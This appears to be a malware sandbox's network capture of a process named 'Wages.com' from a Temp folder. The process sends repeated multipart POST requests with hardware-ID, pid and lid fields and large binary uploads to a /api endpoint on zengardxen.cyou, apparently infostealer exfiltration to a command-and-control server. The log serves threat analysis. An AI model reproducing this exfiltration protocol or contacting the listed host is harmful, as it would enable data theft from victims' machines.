                                    2025-02-14 15:55:56 UTC1369INData Raw: 48 79 6e 4c 4f 67 2b 6b 4e 5a 6e 42 61 77 4c 7a 46 69 65 44 4f 73 42 39 47 77 5a 65 53 44 4a 77 49 4d 77 52 6f 50 58 34 49 31 59 57 50 4e 51 6c 49 4b 51 31 30 64 59 73 47 72 63 55 4a 73 56 75 69 6e 55 4f 44 46 31 53 65 7a 6c 75 78 41 72 79 72 4c 55 4a 56 41 6f 68 78 69 38 4e 72 7a 57 58 79 47 63 4a 2b 78 51 76 6a 6a 6e 47 50 46 4a 49 56 31 67 79 5a 69 44 6c 41 76 4f 36 75 77 78 4e 47 7a 57 43 4e 30 2b 77 65 70 62 46 49 6c 75 33 45 43 47 4f 4d 73 70 77 48 41 78 64 51 47 41 78 5a 38 77 41 36 37 2b 79 42 55 45 47 4a 73 6b 6e 42 37 73 32 6e 39 74 6e 45 65 56 54 5a 4d 55 78 30 6a 78 45 53 47 5a 48 59 69 35 6a 69 54 6a 32 72 71 34 4a 53 77 46 75 33 57 59 59 36 54 32 64 69 54 70 44 38 52 77 6a 68 6a 6e 4c 64 52 41 46 56 55 6c 33 50 32 62 50 41 2b 71 74 76 67 52
                                    Data Ascii: HynLOg+kNZnBawLzFieDOsB9GwZeSDJwIMwRoPX4I1YWPNQlIKQ10dYsGrcUJsVuinUODF1SezluxAryrLUJVAohxi8NrzWXyGcJ+xQvjjnGPFJIV1gyZiDlAvO6uwxNGzWCN0+wepbFIlu3ECGOMspwHAxdQGAxZ8wA67+yBUEGJsknB7s2n9tnEeVTZMUx0jxESGZHYi5jiTj2rq4JSwFu3WYY6T2diTpD8RwjhjnLdRAFVUl3P2bPA+qtvgR
                                    2025-02-14 15:55:56 UTC1369INData Raw: 32 67 47 70 58 72 4a 69 57 45 45 39 42 49 67 6a 44 72 46 65 78 67 61 57 6b 64 67 50 32 48 41 42 4f 79 74 74 51 39 4d 44 43 66 50 4a 41 79 75 50 5a 37 4d 49 6b 32 33 46 44 4c 46 62 6f 70 64 45 51 4e 63 47 79 68 2b 66 34 55 51 6f 4b 71 30 51 68 35 4e 4c 73 67 74 43 36 51 35 6e 73 70 77 41 76 45 42 4b 6f 67 38 32 48 59 58 44 56 31 4e 66 7a 31 6d 7a 51 4c 73 76 37 45 43 52 51 5a 75 6a 47 67 47 73 58 72 4a 69 55 45 55 34 52 6b 74 69 53 44 42 66 52 38 65 58 56 41 79 63 43 44 61 44 76 48 74 34 42 52 57 47 69 6e 64 5a 68 6a 70 50 5a 32 4a 4f 6b 50 78 47 69 79 43 4d 4d 52 75 47 51 35 66 54 33 73 33 5a 4d 4d 4b 34 4b 6d 38 42 55 4d 4f 49 73 6b 76 41 71 59 2b 6d 4d 64 72 44 4c 64 64 61 6f 49 75 69 69 52 63 4b 55 74 44 66 6a 4d 67 31 45 66 35 37 62 38 4f 42 6c 56 75
                                    Data Ascii: 2gGpXrJiWEE9BIgjDrFexgaWkdgP2HABOyttQ9MDCfPJAyuPZ7MIk23FDLFbopdEQNcGyh+f4UQoKq0Qh5NLsgtC6Q5nspwAvEBKog82HYXDV1Nfz1mzQLsv7ECRQZujGgGsXrJiUEU4RktiSDBfR8eXVAycCDaDvHt4BRWGindZhjpPZ2JOkPxGiyCMMRuGQ5fT3s3ZMMK4Km8BUMOIskvAqY+mMdrDLddaoIuiiRcKUtDfjMg1Ef57b8OBlVu
                                    2025-02-14 15:55:56 UTC251INData Raw: 6b 78 68 38 78 6c 46 62 55 6d 4b 59 73 34 7a 57 70 63 46 32 38 4f 4d 6a 46 36 69 31 48 5a 74 50 67 46 53 6b 31 32 67 6a 30 47 71 54 32 4c 33 32 55 50 35 68 67 6e 69 52 54 46 65 77 6f 4c 58 30 4e 6a 4e 79 7a 41 42 4b 44 6a 2b 41 56 65 54 58 61 43 42 77 61 2f 4f 62 37 4b 63 77 71 33 58 57 71 43 49 49 6f 6b 58 44 59 51 55 6e 45 75 59 38 51 59 33 75 33 67 47 33 68 4e 4a 64 51 76 45 61 6f 73 6d 73 52 75 45 73 6c 54 63 74 46 6b 6d 43 35 4f 57 6b 38 41 62 51 45 75 69 77 69 67 39 59 45 62 42 68 74 75 6d 6e 70 50 36 53 6a 52 6b 53 4a 45 39 41 45 34 67 7a 58 63 66 31 73 32 62 6d 64 6b 4e 47 66 62 44 76 65 69 2b 45 77 47 41 6d 36 61 45 55 47 67 50 59 72 59 64 41 37 6e 46 47 71 36 65 49 70 6b 58 46 41 51 64 58 45 77 62 73 77 66 38 65 43 66 46 45 77 0d 0a
                                    Data Ascii: kxh8xlFbUmKYs4zWpcF28OMjF6i1HZtPgFSk12gj0GqT2L32UP5hgniRTFewoLX0NjNyzABKDj+AVeTXaCBwa/Ob7Kcwq3XWqCIIokXDYQUnEuY8QY3u3gG3hNJdQvEaosmsRuEslTctFkmC5OWk8AbQEuiwig9YEbBhtumnpP6SjRkSJE9AE4gzXcf1s2bmdkNGfbDvei+EwGAm6aEUGgPYrYdA7nFGq6eIpkXFAQdXEwbswf8eCfFEw
                                    2025-02-14 15:55:56 UTC1369INData Raw: 32 63 65 64 0d 0a 4b 50 73 55 2f 44 75 6c 30 30 63 38 69 57 36 52 64 61 6f 45 6e 69 69 52 4d 57 67 73 56 49 57 6b 77 6d 52 61 75 74 50 67 55 42 6c 56 38 6a 47 67 54 36 57 4c 52 6a 6d 45 52 35 52 55 70 6b 7a 57 4e 51 69 49 76 53 6b 31 30 4b 58 48 31 4e 2b 65 33 74 51 52 52 48 47 4c 58 4b 77 2b 6e 50 59 65 4a 4c 45 50 34 55 33 4b 38 64 6f 49 38 49 30 59 51 57 44 4a 6d 49 50 34 4b 37 71 4f 2f 46 46 64 41 43 64 67 6c 42 37 34 72 30 59 63 69 42 62 64 4c 65 4d 74 32 7a 6d 31 63 55 41 41 53 4b 57 73 7a 6e 46 6d 79 73 76 59 62 42 68 74 75 6d 6e 70 50 36 53 6a 52 6b 53 4a 45 39 41 45 34 67 7a 58 63 66 31 73 32 62 6d 35 31 4f 47 58 4d 47 61 4b 44 73 78 5a 42 54 57 43 43 4a 30 48 78 41 39 47 42 49 6a 79 35 55 7a 4c 46 62 6f 70 4a 48 77 5a 65 52 32 51 76 4c 65 55 4f
                                    Data Ascii: 2cedKPsU/Dul00c8iW6RdaoEniiRMWgsVIWkwmRautPgUBlV8jGgT6WLRjmER5RUpkzWNQiIvSk10KXH1N+e3tQRRHGLXKw+nPYeJLEP4U3K8doI8I0YQWDJmIP4K7qO/FFdACdglB74r0YciBbdLeMt2zm1cUAASKWsznFmysvYbBhtumnpP6SjRkSJE9AE4gzXcf1s2bm51OGXMGaKDsxZBTWCCJ0HxA9GBIjy5UzLFbopJHwZeR2QvLeUO
                                    2025-02-14 15:55:56 UTC1369INData Raw: 41 49 54 54 79 43 63 45 48 75 4f 59 50 62 5a 41 44 68 45 47 32 37 43 4f 31 79 47 77 6c 47 55 47 55 78 58 76 55 63 34 36 4f 32 42 56 41 63 62 6f 78 6f 44 75 6c 69 71 49 6b 71 51 38 68 64 61 70 31 32 6b 6a 77 70 43 31 35 4f 64 53 68 78 68 69 37 75 71 72 6b 55 56 68 6f 68 67 6d 5a 42 72 33 72 4a 6d 79 78 44 38 77 4a 71 33 57 61 59 4a 30 6c 62 42 78 41 67 49 53 37 53 53 66 62 74 34 46 41 49 54 54 79 43 63 45 48 75 4f 59 50 62 5a 41 44 68 45 47 32 37 43 4f 31 79 47 77 6c 47 55 47 55 78 4c 2b 55 2f 77 5a 4f 47 46 30 55 44 49 4d 55 2b 45 4f 6c 30 30 63 59 69 57 38 35 54 59 73 55 4a 68 44 77 45 53 41 67 41 52 7a 31 75 78 51 37 32 76 50 55 6c 53 41 6f 76 31 44 67 57 70 6e 57 2f 2f 30 4e 44 75 56 4d 73 78 57 36 59 4d 6c 77 4d 51 51 41 71 62 6a 4b 51 58 4c 50 36 36
                                    Data Ascii: AITTyCcEHuOYPbZADhEG27CO1yGwlGUGUxXvUc46O2BVAcboxoDuliqIkqQ8hdap12kjwpC15OdShxhi7uqrkUVhohgmZBr3rJmyxD8wJq3WaYJ0lbBxAgIS7SSfbt4FAITTyCcEHuOYPbZADhEG27CO1yGwlGUGUxL+U/wZOGF0UDIMU+EOl00cYiW85TYsUJhDwESAgARz1uxQ72vPUlSAov1DgWpnW//0NDuVMsxW6YMlwMQQAqbjKQXLP66


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    2192.168.2.449739188.114.97.34437884C:\Users\user\AppData\Local\Temp\562639\Wages.com
                                    TimestampBytes transferredDirectionData
                                    2025-02-14 15:55:57 UTC281OUTPOST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: multipart/form-data; boundary=O8W7XY041YOVJERDM2
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 18163
                                    Host: zengardxen.cyou
                                    2025-02-14 15:55:57 UTC15331OUTData Raw: 2d 2d 4f 38 57 37 58 59 30 34 31 59 4f 56 4a 45 52 44 4d 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 30 43 38 36 43 31 44 46 44 42 38 36 45 41 43 32 42 41 43 34 41 32 44 30 31 45 39 45 44 44 45 0d 0a 2d 2d 4f 38 57 37 58 59 30 34 31 59 4f 56 4a 45 52 44 4d 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4f 38 57 37 58 59 30 34 31 59 4f 56 4a 45 52 44 4d 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 57 47 36 49 36 53 2d 2d 6d 6d 6d 0d 0a
                                    Data Ascii: --O8W7XY041YOVJERDM2Content-Disposition: form-data; name="hwid"00C86C1DFDB86EAC2BAC4A2D01E9EDDE--O8W7XY041YOVJERDM2Content-Disposition: form-data; name="pid"2--O8W7XY041YOVJERDM2Content-Disposition: form-data; name="lid"WG6I6S--mmm
                                    2025-02-14 15:55:57 UTC2832OUTData Raw: 87 a7 66 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45
                                    Data Ascii: f5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE
                                    2025-02-14 15:55:58 UTC1121INHTTP/1.1 200 OK
                                    Date: Fri, 14 Feb 2025 15:55:58 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Vary: Accept-Encoding
                                    Set-Cookie: PHPSESSID=3ltdt1ro36reu7iu94dlrvd3te; expires=Sat, 15 Feb 2025 15:55:57 GMT; Max-Age=86400; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    X-Frame-Options: DENY
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 1; mode=block
                                    cf-cache-status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dN4QTe8ZqFtPGcOF8E3q%2F4Ct0ZKF9Td8p1v4feGmwKPA8wfa0ZEJPQMDlCUF39sig1kC1wqTYIw6BXCd2GXAm2cCr8yOaG8TCXgkpLJCoup7ljbYk4NNXVJJ8UqKBS8RxVg%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 911e3ed478b7c5b9-IAD
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=7229&min_rtt=7219&rtt_var=2728&sent=11&recv=23&lost=0&retrans=0&sent_bytes=2836&recv_bytes=19124&delivery_rate=399780&cwnd=32&unsent_bytes=0&cid=cb31811d2df1b9d6&ts=1361&x=0"
                                    2025-02-14 15:55:58 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                    Data Ascii: fok 8.46.123.189
                                    2025-02-14 15:55:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    3192.168.2.449740188.114.97.34437884C:\Users\user\AppData\Local\Temp\562639\Wages.com
                                    TimestampBytes transferredDirectionData
                                    2025-02-14 15:55:59 UTC278OUTPOST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: multipart/form-data; boundary=L1XEQBKUETKEOFX6
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 8772
                                    Host: zengardxen.cyou
                                    2025-02-14 15:55:59 UTC8772OUTData Raw: 2d 2d 4c 31 58 45 51 42 4b 55 45 54 4b 45 4f 46 58 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 30 43 38 36 43 31 44 46 44 42 38 36 45 41 43 32 42 41 43 34 41 32 44 30 31 45 39 45 44 44 45 0d 0a 2d 2d 4c 31 58 45 51 42 4b 55 45 54 4b 45 4f 46 58 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4c 31 58 45 51 42 4b 55 45 54 4b 45 4f 46 58 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 57 47 36 49 36 53 2d 2d 6d 6d 6d 0d 0a 2d 2d 4c 31 58 45
                                    Data Ascii: --L1XEQBKUETKEOFX6Content-Disposition: form-data; name="hwid"00C86C1DFDB86EAC2BAC4A2D01E9EDDE--L1XEQBKUETKEOFX6Content-Disposition: form-data; name="pid"2--L1XEQBKUETKEOFX6Content-Disposition: form-data; name="lid"WG6I6S--mmm--L1XE
                                    2025-02-14 15:55:59 UTC1130INHTTP/1.1 200 OK
                                    Date: Fri, 14 Feb 2025 15:55:59 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Vary: Accept-Encoding
                                    Set-Cookie: PHPSESSID=u1f5or45to0app1vqkfuvg7knf; expires=Sat, 15 Feb 2025 15:55:59 GMT; Max-Age=86400; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    X-Frame-Options: DENY
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 1; mode=block
                                    cf-cache-status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BeKYehu0MGtkgC%2BPdWR5N7YAgUZGcoo8CPHYg3kPVUOhav9hZzcyB5ozC5VNA5nG%2F4rQTV95nJq%2FXWowE4Nm%2Bf4Jw%2Fhru2Jdy8q54dgGGfjqksQ%2BRXJEJsRGMRB3PPVXf9A%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 911e3ee02ae3e5e8-IAD
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=6732&min_rtt=6724&rtt_var=2538&sent=6&recv=13&lost=0&retrans=0&sent_bytes=2837&recv_bytes=9708&delivery_rate=429854&cwnd=32&unsent_bytes=0&cid=e76cb0e657288d6b&ts=581&x=0"
                                    2025-02-14 15:55:59 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                    Data Ascii: fok 8.46.123.189
                                    2025-02-14 15:55:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    4192.168.2.449741188.114.97.34437884C:\Users\user\AppData\Local\Temp\562639\Wages.com
                                    TimestampBytes transferredDirectionData
                                    2025-02-14 15:56:00 UTC271OUTPOST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: multipart/form-data; boundary=0NOQB56K
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 20377
                                    Host: zengardxen.cyou
                                    2025-02-14 15:56:00 UTC15331OUTData Raw: 2d 2d 30 4e 4f 51 42 35 36 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 30 43 38 36 43 31 44 46 44 42 38 36 45 41 43 32 42 41 43 34 41 32 44 30 31 45 39 45 44 44 45 0d 0a 2d 2d 30 4e 4f 51 42 35 36 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 30 4e 4f 51 42 35 36 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 57 47 36 49 36 53 2d 2d 6d 6d 6d 0d 0a 2d 2d 30 4e 4f 51 42 35 36 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f
                                    Data Ascii: --0NOQB56KContent-Disposition: form-data; name="hwid"00C86C1DFDB86EAC2BAC4A2D01E9EDDE--0NOQB56KContent-Disposition: form-data; name="pid"3--0NOQB56KContent-Disposition: form-data; name="lid"WG6I6S--mmm--0NOQB56KContent-Dispositio
                                    2025-02-14 15:56:00 UTC5046OUTData Raw: b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1 64 f0 52 3c 78 29 f8 d7 c1 d7 cc 07 00 00 00 00
                                    Data Ascii: Mn 64F6(X&7~`aO@dR<x)
                                    2025-02-14 15:56:01 UTC1123INHTTP/1.1 200 OK
                                    Date: Fri, 14 Feb 2025 15:56:01 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Vary: Accept-Encoding
                                    Set-Cookie: PHPSESSID=itk3u17n95c5ltnfcvacn02mq3; expires=Sat, 15 Feb 2025 15:56:00 GMT; Max-Age=86400; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    X-Frame-Options: DENY
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 1; mode=block
                                    cf-cache-status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TCKnC5IbztwJyLlfIvuRZ0XFAWpp8QZeVRo%2FSpL5aTsRM941ZRixzNln5PZmXs9pnd2h9Y94xBT5VghjK6hXNHVu3eCv6wPK4WdnIQelRIN4hxLpbUnnYsUVcX%2BSAArN3w8%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 911e3ee72af4428f-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=1705&min_rtt=1705&rtt_var=640&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2837&recv_bytes=21328&delivery_rate=1707602&cwnd=115&unsent_bytes=0&cid=45c4f08398c76d7d&ts=763&x=0"
                                    2025-02-14 15:56:01 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                    Data Ascii: fok 8.46.123.189
                                    2025-02-14 15:56:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    5192.168.2.449742188.114.97.34437884C:\Users\user\AppData\Local\Temp\562639\Wages.com
                                    TimestampBytes transferredDirectionData
                                    2025-02-14 15:56:01 UTC273OUTPOST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: multipart/form-data; boundary=WF1N3UL2JOP
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 2617
                                    Host: zengardxen.cyou
                                    2025-02-14 15:56:01 UTC2617OUTData Raw: 2d 2d 57 46 31 4e 33 55 4c 32 4a 4f 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 30 43 38 36 43 31 44 46 44 42 38 36 45 41 43 32 42 41 43 34 41 32 44 30 31 45 39 45 44 44 45 0d 0a 2d 2d 57 46 31 4e 33 55 4c 32 4a 4f 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 57 46 31 4e 33 55 4c 32 4a 4f 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 57 47 36 49 36 53 2d 2d 6d 6d 6d 0d 0a 2d 2d 57 46 31 4e 33 55 4c 32 4a 4f 50 0d 0a 43 6f 6e 74 65 6e
                                    Data Ascii: --WF1N3UL2JOPContent-Disposition: form-data; name="hwid"00C86C1DFDB86EAC2BAC4A2D01E9EDDE--WF1N3UL2JOPContent-Disposition: form-data; name="pid"1--WF1N3UL2JOPContent-Disposition: form-data; name="lid"WG6I6S--mmm--WF1N3UL2JOPConten
                                    2025-02-14 15:56:02 UTC1127INHTTP/1.1 200 OK
                                    Date: Fri, 14 Feb 2025 15:56:02 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Vary: Accept-Encoding
                                    Set-Cookie: PHPSESSID=1cgam8mrdigorek9fhg3qf060q; expires=Sat, 15 Feb 2025 15:56:02 GMT; Max-Age=86400; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    X-Frame-Options: DENY
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 1; mode=block
                                    cf-cache-status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bkms3Pt8uG1vUyi9vsSUBsDT5QBfRhb6a6cR%2Faf%2FCdv06eAMELQTNtMhTyWBy%2BpFMqlldYsswuasx1vMP5rO2YGosHn5GjVzsniGVuLcTvbJn0%2FEyrHASn6CNtf7Ql1Z%2F%2Fs%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 911e3eef6ce87004-IAD
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=7388&min_rtt=7373&rtt_var=2776&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=3526&delivery_rate=396039&cwnd=32&unsent_bytes=0&cid=f3378452d5cd68df&ts=645&x=0"
                                    2025-02-14 15:56:02 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                    Data Ascii: fok 8.46.123.189
                                    2025-02-14 15:56:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    6192.168.2.449743188.114.97.34437884C:\Users\user\AppData\Local\Temp\562639\Wages.com
                                    TimestampBytes transferredDirectionData
                                    2025-02-14 15:56:03 UTC277OUTPOST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: multipart/form-data; boundary=64YFSWT7I6O5L
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 558936
                                    Host: zengardxen.cyou
                                    2025-02-14 15:56:03 UTC15331OUTData Raw: 2d 2d 36 34 59 46 53 57 54 37 49 36 4f 35 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 30 43 38 36 43 31 44 46 44 42 38 36 45 41 43 32 42 41 43 34 41 32 44 30 31 45 39 45 44 44 45 0d 0a 2d 2d 36 34 59 46 53 57 54 37 49 36 4f 35 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 36 34 59 46 53 57 54 37 49 36 4f 35 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 57 47 36 49 36 53 2d 2d 6d 6d 6d 0d 0a 2d 2d 36 34 59 46 53 57 54 37 49 36 4f 35 4c
                                    Data Ascii: --64YFSWT7I6O5LContent-Disposition: form-data; name="hwid"00C86C1DFDB86EAC2BAC4A2D01E9EDDE--64YFSWT7I6O5LContent-Disposition: form-data; name="pid"1--64YFSWT7I6O5LContent-Disposition: form-data; name="lid"WG6I6S--mmm--64YFSWT7I6O5L
